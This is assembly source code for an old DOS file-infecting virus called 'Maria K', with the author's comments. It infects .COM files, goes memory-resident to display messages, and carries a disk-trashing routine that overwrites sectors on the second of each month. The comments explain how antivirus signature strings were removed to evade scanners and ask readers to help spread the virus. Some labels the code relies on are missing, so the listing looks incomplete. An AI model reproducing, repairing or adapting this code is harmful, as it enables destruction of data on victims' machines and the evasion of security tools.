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2022-08-21 04:07:57 -05:00

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; VirusName : Maria K..
; Country : Sweden
; Author : The Unforiven / Immortal Riot
; Date : 26/09/1993
; This is a mutation of the "Bobvirus" written by Phalcon/Skism,
; Many thanks must go to the scratch coder of this one..(DA?)
; Mcafee Scan used to find this as "Cloud" Virus, But also
; as the "Beta" Virus. So..two guys in this little babe...
; This is a non-overwriting .COM files infector, it doesn't do
; anything to .EXE files, nor This goes memory
; resident. When it "goes-off", it prints out a "BOBism" every
; 5 minutes. If the virus finds itself in the memory, it will not
; go up again. It will NOT infect a program when you starts it,
; it's just the "printer-part" who is in memory"..
; This version is not encrypted as the original one, but instead,
; a hd-trasher has been added, so if some infected file is ran
; at the 2:nd every month, someone (me), will be very pleased..
; Scan v108 can't find this, BUT! S&S Toolkit 6.54 do find it!
; F-Prot (2.09) DON'T find this and TBScan can't identify it
; as the "original" virus, It says it's some "Unknown Virus".
; Okey, think that's all, have phun, and remember,
; livi'n ain't no crime!
ORG 100h
DTA_fileattr EQU 21
DTA_filetime EQU 22
DTA_filedate EQU 24
DTA_filesize EQU 26
DTA_filename EQU 30
virus_marker equ 026FFh ; JMP WORD PTR
virus_marker2 equ 00104h ; 0104h
part1_size equ part1_end - part1_start
part2_size equ part2_end - part2_start
offset_off equ duh2
init_delay equ 5280 ; Initial delay
delay equ 400 ; Subsequent delay
num_Messages equ 7 ; Number of "Bob" messages
waves equ 7 ; Number of waves to go off after
infec_date equ 0606h ; Swedish National Day (0606)..
Counter equ 108h
D_Mess equ 110h
Int_08_Start equ 112h
; S&S Toolkit 6.54 (FindViru) "string" is placed at the "jmp word ptr duh",
; If you finds something to add here, then do! The place he placed his
; string is there the virus identify itselves, and I've failed with get
; the virus to work after some dully attempt to add some meanless shit.
; Anyhow..I must say that Alan kicks my ass here!..Eat my shorts!..
jmp word ptr duh
duh dw middle_part_end - part1_start + 100h
duh2 dw 0
;Part 2 begins: Dis is the D-Cool part
call decrypt
mov si, offset Go
add si, offset_off
jmp si
encrypt_val db 00h
; Encrypt/Decrypt isn't really a "Crypt" Routine. Instead, it will check
; what day it if, and if it's the second (2:nd) any month, procedure Stone-
; Heart will blow off. Stoneheart makes your "heart"-drives be quite empty.
mov ah,2ah ; Day-Checking..
int 21h ;
cmp dl,02 ; Check if day 02..
je STONEHEART ; If're a lucky guy
jmp SORRY ; Otherwise..try with "date 02"..
STONEHEART: ; Name of her..
cli ;
mov ah,2 ; Starting right on..
cwd ; Starting it from 0.
mov cx,0100h ; Continue to 256....
int 026h ; No Exchauses!
jmp MARIA ; Jump For Joy..(J4J)..
MARIA: ; Yeah, her's other handle..
MOV AL,3 ; Continue with drive D..
MOV CX,700 ; Make drive d's heart fall apart..
MOV DX,00 ; Start from sector 0
MOV DS,[DI+99] ; Put random crap in DS
MOV BX,[DI+55] ; More crap in BX
CALL STONEHEART ; J4J..once again..
SORRY: ; I'm feeling soo sorry for you!
RET ; Cuz you managed to return!
; This used to be under Decrypt/Encrypt, but well, since I don't want
; no encryptions in this virus, I just remarked this..And well, Mcaffe's
; Beta String used to be place at "mov di, si", that might also be a little
; reason..Anyhow..since I didn't coded this from scratch, I can't deny you
; from modify in this code..So..Get your Encryption if you wants!
; MOV si, offset encrypt_val
; ADD si, offset_off
; MOV ah, byte ptr [si]
; MOV cx, offset part2_end - offset bam_bam
; ADD si, offset bam_bam - offset encrypt_val
; MOV di, si ; - "Beta-String used to be here..
lodsb ; DS:[SI] -> AL
xor al, ah
loop xor_loop
; Copying routine
push si ; SI -> buffer3
call encrypt
mov cx, part2_size
pop dx
add dx, offset part2_start - offset buffer3
mov ah, 40h
int 21h
call decrypt ; See what to do..
buffer db 0CDh, 20h, 0, 0, 0, 0, 0, 0
buffer2 db part1_end - part1_start dup (?)
buffer3 dw ?
orig_path db 64 dup (?)
num_infec db 0 ; Infection wave number
infec_now db 0 ; Number files infected this time
root_dir db '\',0 ; Root Dir spec
com_mask db '*.com',0 ; Files to infect
dir_mask db '*.*',0 ; Files to search for..
back_dir db '..',0 ; Dot-Dot..
nest dw 0
DTA db 43 DUP (0) ; For use by infect_dir
Go: ; Proc there Mcaf "cloud" string is placed.
add si, offset buffer - offset Go
mov di, si
add di, offset buffer2 - offset buffer
cmp dx, infec_date ; Added this two lines, and
jz Go_Psycho ; "Cloud" string is gone...
mov cx, part1_size
rep movsb
mov ah, 47h ; Get directory
xor dl,dl ; Default drive
add si, offset orig_path - offset buffer - 8
int 21h ; in orig_path
jc Go_Error
mov ah, 3Bh ; Change directory
mov dx, si ; to the root dir
add dx, offset root_dir - offset orig_path
int 21h
jc Go_Error
add si, offset num_infec - offset orig_path
inc byte ptr [si] ; New infection wave
push si ; Save offset num_infec
add si, offset infec_now - offset num_infec
mov byte ptr [si], 3 ; Reset infection
; counter to 3
; for D-new run.
call traverse_fcn ; Do all the work
pop si ; Restore offset num_infec
cmp byte ptr [si], waves ; 10 infection waves?
jge Go_Psycho ; If so, activate
mov ah, 2Ah ; Get date
int 21h
cmp dx, infec_date ; Is it 06/06?
jz Go_Psycho ; If so, activate
jmp quit ; And then quit
jmp Psycho ; Yeah, right!
origattr db 0
origtime dw 0
origdate dw 0
filesize dw 0 ; Size of the uninfected file
oldhandle dw 0
;D-Traversal function begins
traverse_fcn proc near
push bp ; Create stack frame
mov bp,sp
sub sp,44 ; Allocate space for DTA
push si
jmp infect_directory
mov ah,1Ah ;Set DTA
lea dx,word ptr [bp-44] ;to space allotted
int 21h ;Do it now, do it hard!
mov ah, 4Eh ;Find first
mov cx,16 ;Directory mask
mov dx,offset dir_mask ;*.*
add dx,offset_off
int 21h
jmp short isdirok
cmp byte ptr [bp-14], '.' ;Is first char == '.'?
je short donext ;If so, loop again
lea dx,word ptr [bp-14] ;else load dirname
mov ah,3Bh ;and changedir there
int 21h ;Yup, yup
jc short donext ;Do next if invalid
mov si, offset nest ;Else increment nest
add si, offset_off
inc word ptr [si] ;nest++
call near ptr traverse_fcn ;recurse directory
lea dx,word ptr [bp-44] ;Load space allocated for DTA addr
mov ah,1Ah ;and set DTA to it
int 21h ;cause it might have changed
mov ah,4Fh ;Find next
int 21h
jnc gonow ;If OK, jmp elsewhere
mov si, offset nest
add si, offset_off
cmp word ptr [si], 0 ;If root directory (nest == 0)
jle short cleanup ; Quit
dec word ptr [si] ;Else decrement nest
mov dx,offset back_dir ;'..'
add dx, offset_off
mov ah,3Bh ;Change directory
int 21h ;to previous one
pop si
mov sp,bp
pop bp
traverse_fcn endp
;D-Traversal function ends
jmp Error
;Set nest to nil
mov si, offset nest ;in order to
add si, offset_off ;halt the D-Cool
mov word ptr [si], 0 ;traversal fcn
jmp short cleanup
jmp short In_fcn ;Return to traversal function
mov ah, 1Ah ;Set DTA
mov dx, offset DTA ;to DTA struct
add dx, offset_off
int 21h
mov ah, 04Eh ;Find first file
mov cx, 0007h ;Any file
mov dx, offset com_mask ;DS:[DX] --> filemask
add dx, offset_off
int 21h ;Fill DTA (hopefully)
jc return_to_fcn ;<Sigh> Error #E421:0.1
jmp check_if_COM_infected ;I<___-Cool! Found one!
mov si, offset infec_now ;Another loop,
add si, offset_off ;Another infection
dec byte ptr [si] ;Infected three?
jz enuff_for_now ;If so, exit
mov ah,4Fh ;Find next
int 21h
jc return_to_fcn
mov si, offset DTA + dta_filename + 6 ; look at 7th letter
add si, offset_off
cmp byte ptr [si], 'D' ;??????D.COM?
jz find_next_file ;Don't kill COMMAND.COM
mov ax,3D00h ;Open channel read ONLY
mov dx, si ;Offset Pathname in DX
sub dx, 6
int 21h ;Open NOW!
jc find_next_file ;If error, find another
xchg bx,ax ;bx is now handle
mov ah,3Fh ;Save
mov cx, part1_size ;first part
mov dx, offset buffer ;to buffer
add dx, offset_off ;to be restored
push dx
int 21h ;later
pop si ;Check for virus ID bytes
;in the buffer
push si
lodsw ;DS:[SI] -> AX
cmp ax, virus_marker ;Compare it
jnz infect_it ;infect if ID #1 not found
lodsw ;Check next two bytes
cmp ax, virus_marker2 ;Compare it
jnz infect_it ;infect if ID #2 not found
pop si
mov ah, 3Eh ;else close the file
int 21h ;and go find another
jmp find_next_file ;'cuz it's already infected
Signature db 'Immortal Riot'
;D-Good Stuff - Infection routine
; save fileattr
pop si
add si, offset DTA + DTA_fileattr - offset buffer
mov di, si
add di, offset origattr - offset DTA - DTA_fileattr
movsb ;DS:[SI] -> ES:[DI]
movsw ;Save origtime
movsw ;Save origdate
movsw ;Save filesize
;Only need LSW
;because COM files
;can only be up to
;65535 bytes long
cmp word ptr [si - 2], part1_size
jl bomb_out ;is less than 8 bytes.
mov ah, 2Ch ;get time
int 21h
add dl, dh ;1/100 sec + 1 sec
jz do_again ;Don't want orig strain!
mov si, offset encrypt_val
add si, offset_off
mov byte ptr [si], dl ;255 mutations
mov ax, 4301h ;Set file attributes
xor cx, cx ;to nothing
mov dx, si ;filename in DTA
add dx, offset DTA + DTA_filename - offset encrypt_val
int 21h ;do it now, my child
mov ah, 3Eh ;Close file
int 21h ;handle in BX
mov ax, 3D02h ;Open file read/write
int 21h ;Filename offset in DX
jc bomb_out ;Damn! Probs
mov di, dx
add di, offset oldhandle - offset DTA - DTA_filename
;copy filehandle to
stosw ;AX -> ES:[DI]
xchg ax, bx ;file handle in BX now
mov ah, 40h ;Write DS:[DX]->file
mov cx, part1_size - 4 ;number of bytes
mov dx, 0100h ;where code starts
int 21h ;(in memory)
mov ah, 40h
mov si, di ; mov si, offset filesize
add si, offset filesize - 2 - offset oldhandle
add word ptr [si], 0100h
mov cx, 2
mov dx, si
int 21h ;write jmp offset
mov ax, [si] ;AX = filesize
sub ax, 0108h
add si, offset buffer3 - offset filesize
push si
mov word ptr [si], ax
mov ah, 40h
mov cx, 2
mov dx, si
int 21h
mov ax, 4202h ;move file ptr
xor cx, cx ;from EOF
xor dx, dx ;offset cx:dx
int 21h
call copy_rest_stuff
pop si
add si, offset oldhandle - offset buffer3
mov bx, word ptr [si]
mov ax, 5701h ;Restore
add si, offset origtime - offset oldhandle
mov cx, word ptr [si] ;old time and
add si, 2
mov dx, word ptr [si] ;date
int 21h
mov ah, 3Eh ;Close file
int 21h
mov ax, 4301h ;Restore file
xor ch, ch
add si, offset origattr - offset origtime - 2
mov cl, byte ptr [si] ;attributes
mov dx, si ; filename in DTA
add dx, offset DTA + DTA_filename - offset origattr
int 21h ;do it now
jmp find_next_file2
jmp error
; Check if already installed
push es
mov byte ptr cs:[100h],0 ;Initialize fingerprint
xor bx, bx ;Zero BX for start
mov ax, cs
Init1: inc bx ;Increment search segment
mov es, bx ;value
cmp ax, bx ;Not installed if we reach
je Not_Installed_Yet ;the current segment
mov si, 100h ;Search segment for
mov di, si ;fingerprint in first
mov cx, 4 ;four bytes
repe cmpsb ;Compare
jne init1 ;If not equal, try another
jmp Quit_Init ;else already installed
pop es
mov word ptr cs:[Counter], init_delay
mov word ptr cs:[D_Mess], 1
; Copy interrupt handler to beginning of code
mov si, offset _int_08_handler
add si, offset_off
mov di, Int_08_Start
mov cx, int_end - int_start
rep movsb ;DS:[SI]->ES:[DI]
mov ax, 3508h ;Get int 8 handler
int 21h ;put in ES:BX
mov cs:[duh], bx ;Save old handler
mov cs:[duh+2], es ;in cs:[104h]
mov ax, 2508h ;Install new handler
mov dx, Int_08_Start ;from DS:DX
int 21h ;Do it
push es
mov ax, ds:[2Ch] ;Deallocate program
mov es, ax ;environment block
mov ah, 49h
int 21h
pop es
mov ax, 3100h ;TSR
mov dx, (offset int_end - offset int_start + offset part1_end - offset Code + 4 + 15 + 128) SHR 4
; these two lines are the "long" line above..pls, but m together..
; mov dx, (offset int_end - offset int_start + offset part1_end -
; offset Code + 4 + 15 + 128) SHR 4
int 21h
int 20h ;In case of error
pop es
Error: ;On error, quit
mov ah, 3Bh ;Change directory
mov dx, offset root_dir ;to the root dir
add dx, offset_off
int 21h
mov ah,3Bh ;Change directory
;Return to orig dir
add dx, offset orig_path - offset root_dir
int 21h
; Copy buffer back to beginning of file
mov si, dx
add si, offset buffer2 - offset orig_path
mov di, 0100h
mov cx, part1_end - part1_start
rep movsb
mov di, 0100h
jmp di
_int_08_handler proc far
push ax
push bx
push cx
push dx
push si
push ds
push es
dec word ptr CS:[Counter] ;Counter
jnz QuitNow
mov word ptr CS:[Counter], delay ;Reset counter
; Set up DS & ES to equal CS
push cs
pop ds
push cs
pop es
mov si, offset Messages - offset int_start + int_08_start
mov cx, cs:D_Mess
xor ah, ah
lodsb ;DS:SI -> AL
add si, ax ;ES:BP -> Next message to display
loop LoopY_ThingY
xchg si, bp
xor cx, cx
mov cl, al ;Length of string
mov ax, 1300h ;
mov bx, 0070h ;Page 0, inverse video
xor dx, dx ;(0,0)
int 10h ;Display ES:BP
inc word ptr cs:[D_Mess]
cmp word ptr cs:[D_Mess], num_messages
jnz Sigh
mov word ptr cs:[D_Mess], 1
Sigh: mov cx, 30h
Sigh2: push cx
mov cx, 0FFFFh
DelayX: loop DelayX
pop cx
loop Sigh2
xchg si, bp
pop es
pop ds
pop si
pop dx
pop cx
pop bx
pop ax
jmp dword ptr CS:duh
; Please don't just change the notes here included in the virus, and
; claim that it's your production. I know this isn't mine, but afterall,
; you could atleast say that I "renaissanced" it. Cuz mane people actually
; scans their programs nowdays (..or atleast here..), which makes it
; quite stupid to spread a virus which scan etc can find. And well, I'd
; like to get this little shit a bit spread..can you get it for me? :)..
Messages db 0
db 15, 'Maria K lives..' ; She ain't dead..
db 21, 'Somewhere in my heart..' ; That's truh..huh?
db 22, 'Somewhere in Sweden..' ; She lives here!
db 26, 'I might be insane..' ; I might be that..
db 38, 'But the society to blame..' ; Might be true....
db 40, 'The Unforgiven / Immortal Riot' ; That's me....
_int_08_handler endp
CODE ends
end part1_start
; Greetings goes out to: Raver, Metal Militia, Scavenger,
; and of-cuz a mega Greeting to Maria K !..